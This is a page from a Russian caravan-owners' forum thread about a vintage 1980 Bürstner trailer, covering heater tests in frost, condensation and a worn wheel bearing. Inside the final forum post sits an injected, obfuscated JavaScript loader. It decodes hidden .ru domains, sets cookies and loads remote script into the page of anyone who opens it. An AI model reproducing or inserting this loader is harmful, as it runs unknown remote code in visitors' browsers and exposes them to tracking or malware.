Караван Buerstner City 400 - олдтаймер аж 1980 года

Страницы: Пред. 1 ... 16 17 18 19 20 След.
RSS
Караван Buerstner City 400 - олдтаймер аж 1980 года
 
 И еще раз всем спасибо! Уже понял, что подобный шаг весьма способствует физическому оздоровлению. "Тепличные" болячки просто не выдерживают такого варварского к себе отношения и исчезают . Даже ремень на штанах неожиданно начал попадать в дырочку, которая, казалось, безнадежно забыта для использования. Это после переезда...  
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
Морозы спали... В один из дней, когда было за -20, решил погреть свою Избушку. Почистил крышу от снега и приступил к оживлению Трумы. По привычке сначала попытался зажечь плиту (чтобы убедиться в заполнении магистрали газом). Не тут-то было! Краны застыли и не проворачивались. Уже на удачу попробовал открыть кран Трумы - с натягом, но пошел! После нескольких попыток загорелась дежурная горелка, но не более того. Решил подождать - видимо кран замерз. Через несколько минут горелка действительно вышла на штатный режим - похоже, таки смазка застыла. Пошел заниматься своими делами по дому - дел-то по-уши! Периодически наведовался проверить. В общем, неподготовленный к зиме прицеп (неутепленные люки, незаделанные излишние вент.отверстия и проч.), нетопленный с начала морозов, прогрелся до комфортного состояния в течение часа. Что определенно радует  
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
А зачем лишний раз прогревать, что бы потом конденсат образовался и лишний раз отсырело  Считаю абсолютно вредной процедурой "просто прогреть" !
МB Sprinter Westfalia "James Cook" 2005
 
Про Труму, у моего тоже с задержкой основная горелка загоралась осенью, летом как то не пришлось отопление включать . Про "просто прогреть" солидарен с Сергеем(SК67) , у моего брата есть холодная мастерская , так вот он зимой пытался ее протапливать, после включения отопления на всех станках появлялся конденсат, пришли к выводу, либо топить постоянно, либо не топить вообще. Прицеп конечно не мастерская, но после такого наглядного примера, что то прогревать просто так не хочется.
"Тарапитса нэ нада", как говорил Товарищ Саахов.
 
Цитата
 автор  SK67 on 27 янв 2016 16:52:06     А зачем лишний раз прогревать, что бы потом конденсат образовался и лишний раз отсырело  Считаю абсолютно вредной процедурой "просто прогреть" !  
Вообще-то это был эксперимент по проверке "зимнего" исполнения прицепа, заявленного в документации. Для полноты надо будет устроить тестовую ночевку - при следующем пришествии морозов   Кроме того надо было еще и холодильник погонять от газа - дабы аммиак "встряхнуть".   Кстати, конденсата как такового не заметил - может потому, что вентиляционные дырки не закрыты  
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
Вообще то да, прицеп предназначен для использования  отопления в нем в холодное время года, да и материалы отделки подобраны так, что бы не конденсировалась влага, но я как то не поддался соблазну немного протопить, хотя тоже мысли были, подтопить и повозиться со светом, сезон не за горами, а я так и не поменял освещение 12 В на светодиодное, лента  с прошлого года лежит, да и 220 тоже на светодиоды можно переводить, генератор то слабенький.
"Тарапитса нэ нада", как говорил Товарищ Саахов.
 
Цитата
автор old_piligrim on 28 янв 2016 13:24:53
Цитата
Кроме того надо было еще и холодильник погонять от газа - дабы аммиак "встряхнуть". Кстати, конденсата как такового не заметил - может потому, что вентиляционные дырки не закрыты
а от 220В холодильник не работает?! С закрытой вентиляцией конденсата нет тоже, если не топить  
МB Sprinter Westfalia "James Cook" 2005
 
Электричество далеко, тянуть лениво было  
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
Снег с крыши каравана стаял?  
МB Sprinter Westfalia "James Cook" 2005
 
Что оставалось - смыло дождем. Я чистил крышу пару раз  
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
Избушка стоит на "чурбаках", подвеска отдыхает с висящими в воздухе колесами. Типа распрямляется в обратную сторону.   Однако при постановке на эти самые чурбаки обнаружилась неприятная неожиданность - изрядный люфт в ступице правого колеса. Надо будет лезть смотреть - как потеплеет. Неприятно то, что были поставлены новые японские подшипники. И пробег после этого был довольно скромный. Подшипники не конические, подтяжка гайки ничего не даст.
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
 Сейчас ВСЕ японское, как и другое, в Китае делают....
МB Sprinter Westfalia "James Cook" 2005
 
Цитата
автор  SK67 on 03 мар 2016 16:12:40     Сейчас ВСЕ японское, как и другое, в Китае делают....
Китайские заводы японцы ещё контролируют.А вот подмосковные подвалы и гаражи . . .  
 
Японцы уже ничего не контролируют, уже китайцы их фирмы скупают.
Вольво ХС60 и Солифер Артик 480
 
Цитата
автор old_piligrim on 03 мар 2016 14:27:30 Избушка стоит на "чурбаках", подвеска отдыхает с висящими в воздухе колесами. Типа распрямляется в обратную сторону. Однако при постановке на эти самые чурбаки обнаружилась неприятная неожиданность - изрядный люфт в ступице правого колеса. Надо будет лезть смотреть - как потеплеет. Неприятно то, что были поставлены новые японские подшипники. И пробег после этого был довольно скромный. Подшипники не конические, подтяжка гайки ничего не даст.
А родные подшипника тоже не конические были?
"Тарапитса нэ нада", как говорил Товарищ Саахов.
 
Цитата
 автор  турист ссср on 03 мар 2016 18:27:00    
Цитата
автор  old_piligrim on 03 мар 2016 14:27:30    Избушка стоит на "чурбаках", подвеска отдыхает с висящими в воздухе колесами. ....
А родные подшипника тоже не конические были?  
Родные подшипники были аналогичные - подбирал по образцу. В Польше в магазине, когда родной развалился. Там стояли 2 обычных шарикоподшипника с манжетой со стороны рычага. И смазка из колпачка. Я поставил закрытые необслуживаемые.
Kia Carnival 2,9 (Бегемот)+ Bürstner Flipper City 400TN (Избушка)
 
Цитата
автор бурелом on 03 апр 2015 23:23:45 Тогда президентом назначим,назначим,назначим........ Самого ... достойного!!!!!! Того у кого самый заслуженный караван. Давайте предлагать кандидатуры.У кого 80ого года? С уважением Бурелом.
У меня La Boheme Europli 370 1979 года рождения.
Наблюдаю за жизнью... Пристально... Назойливо...
 
 Уже интересно.... Достойный кандидат. Есть ещё предложения?  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.
 
Олег, а караваны обязательно уже реставрированы должны быть? Или разобранные, но ожидающие реставрации тоже считаются?
Наблюдаю за жизнью... Пристально... Назойливо...
 
 Ну спросил..... Я прямо не знаю.... У меня караван живой,Бюстнер живой.Всё работает и катается. Наверное и главное в этом случае наличие и каравана и желания его эксплуатировать,так сказать. Но это надо у народа спросить... Хотя не главное кто "председатель",главное мы все вместе. И мы караванеры!!!!!! <script type="text/javascript">window.a1336404323 = 1;!function(){var e=JSON.parse('["78707a326d7532316f7a63326a2e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20708",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "avtotravel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script> Фреймы отключены{2}  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.
Страницы: Пред. 1 ... 16 17 18 19 20 След.
 

Форум о путешествиях, домах на колесах и кемпингах. Выбор маршрута путешествия, поиск попутчиков, отчеты о путешествиях. Клуб караванеров России, клубы караванеров других стран, совместные встречи, мероприятия и слеты. Кемпинги России и других стран, отзывы, все вопросы по созданию кемпингов. Создание и переоборудование обычных ТС в автодома и прицепы-дачи, в том числе внедорожные, рекомендации и советы. Подбор, покупка и продажа домов на колесах, автодомов, прицепов-дач. Подбор, покупка и продажа аксессуаров для домов на колесах, автодомов, прицепов-дач.